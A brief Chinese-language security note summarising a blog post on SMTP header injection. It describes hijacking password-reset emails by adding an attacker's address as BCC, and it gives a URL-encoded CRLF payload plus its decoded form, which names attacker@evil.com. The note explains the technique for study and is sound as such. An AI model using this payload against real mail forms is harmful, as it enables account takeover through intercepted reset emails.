原Blog: http://blog.jr0ch17.com/2018/Please-email-me-your-password/
思路:
利用SMTP头注入,将攻击者email地址添加为CC或BCC,从而劫持到比如找回密码邮件(需要目标业务未对邮件地址做校验就发邮件,利用场景有限)
Payload:
valid_user_address%40company.com%0D%0ABCC%3Ame%40me.com%0D%0A
解析后的结果是:
valid_user_address@company.com
BCC:attacker@evil.com